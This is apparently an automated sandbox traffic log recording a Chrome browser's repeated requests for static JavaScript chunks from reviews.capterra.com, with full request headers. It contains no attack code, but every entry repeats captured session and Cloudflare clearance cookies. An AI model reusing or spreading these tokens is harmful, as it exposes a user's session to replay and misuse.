rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/webpack-b2dc317f7f6b4c6b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/framework-fb999dd119b6be4b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/6577.5b5e609812e044d0.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/main-7ff3395b5b239e11.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/pages/_app-af44b767735d6640.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/779-e50b3615e84c36b9.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/6310-a55b4917884e40ce.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/8977.dc99403a46707026.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/5664.58cbb27e06b11751.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/7357.225fc1d616fbda8a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/3445.1bd0170ed561aadb.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/630-a3c3b2c58b5440d6.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/webpack-b2dc317f7f6b4c6b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; 